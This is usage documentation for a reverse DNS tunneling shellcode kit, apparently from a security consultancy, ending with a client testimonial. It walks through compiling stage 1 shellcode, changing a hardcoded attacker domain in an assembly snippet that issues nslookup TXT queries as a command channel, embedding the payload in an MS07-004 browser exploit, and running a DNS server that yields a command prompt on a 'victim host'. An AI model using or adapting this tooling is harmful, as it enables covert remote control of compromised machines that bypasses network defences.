|
Reverse DNS Tunneling Shellcode v0.3 Documentation
Current Limitations
 |
stage 1 asm is currently hardcoded for tysblackhat.com
- need to make a generator program so that this is dynamic
|
| |
stage2 shellcode creates files on the desktop of victim if it dies
|
| |
issues exist for requestId numbers greater than 99
|
| |
no WSAStartup so only works with internet connected software
|
| |
sleep is hardcoded
|
| |
GetProcAddress is hardcoded
|
| |
the server dies periodically, but no big deal since the probes continue, so you can start it back up and keep sending commands
|
| |
slow from command line due to DNS
|
| |
back slashes aren't escaped
|
| |
shellcode is memory resident and is not persistent
|
Considerations
| |
It is not a console. It an interface to run a single command at a time.
|
| |
No environment carried between commands
- navigation is useless. Listing directories done in one command.
- i.e. useless to cd to a directory since the next command starts at the desktop again
|
How To
1. Compile asc.c for alphanumeric encoding
gcc -o asc asc.c
2. Modify hardcoded domain in reverse-dns-shellcode-stage1-v03.asm
In future versions this will be automated via a generator program like for the stage 2 shellcode.
Towards the bottom you will find the following lines;
GetCommandString:
call GetCommandStringReturn
db 'nslookup -q=TXT -timeout=9 OBZG6YTF.0000-0000.0000.0001.tysblackhat.comN'
Change the domain from "tysblackhat.com" to be your domain.
This screws up a couple of hardcoded values in the shellcode that needs to be updated to reflect the size of your domain string.
Locate the following lines and update the numbers based on the comments below;
jmp GetCommandString
GetCommandStringReturn:
pop ecx
mov edx,0x0000000A
mov [ecx + 71],dl ;71 is the length of the above db string without the "N". Update this to reflect your domain string length.
lea edi,[ebp-606Ch]
lea esi,[ecx]
mov ecx,72 ;Here we have 72. Similarly change this but obviously add one to your value above.
rep movsb
mov dword [ebp-6070h],48h ;48h is the hex version of 72 ... Change your second value above to hex.
3. Compile the stage 1 shellcode
You need to have nasm, xxd and bash installed and in your path.
I am using;
nasm version 2.03.01
xxd version V1.10
If you have this then run the following;
./reverse-dns-shellcode-stage1-compiler-v03.sh reverse-dns-shellcode-stage1-v03.asm
This will produce the following files and will also output some of this to STDOUT;
reverse-dns-shellcode-stage1-v03.bin
reverse-dns-shellcode-stage1-v03.shellcode
reverse-dns-shellcode-stage1-v03.unicode
reverse-dns-shellcode-stage1-v03-ms07-004.html
4. Insert the shellcode into your exploit
reverse-dns-shellcode-stage1-v03-ms07-004.html has been included just as a sample exploit that automatically gets the shellcode inserted.
5. Start the Reverse DNS Tunneling Shellcode DNS Server
I created a start script for this;
reverse-dns-shellcode-server-start-v03.sh
Edit this file to replace tysblackhat.com to contain your domain name, then run it.
This should drop you to an initial command prompt where you can enter your first command before you even send off your exploit.
This is to ensure that we don't waste any DNS probes from the victim host so we run commands immediatly.
From here you basically send off your exploit and wait for the DNS Server to display "[Command Sent Over DNS]", which means it is go time!
You should now have a command prompt on your victim host tunneled over DNS.
Enjoy and keep an eye out for later versions of the shellcode.
Ty Miller
www.projectshellcode.com
Business Services
"Pure Hacking distinguish themselves by successfully communicating difficult
technical concepts to all levels. They also followed through with their promise
to continue support in explaining these concepts long after our contract finished."
IT Manager - Production Systems, International Business Services Corporation
|
|
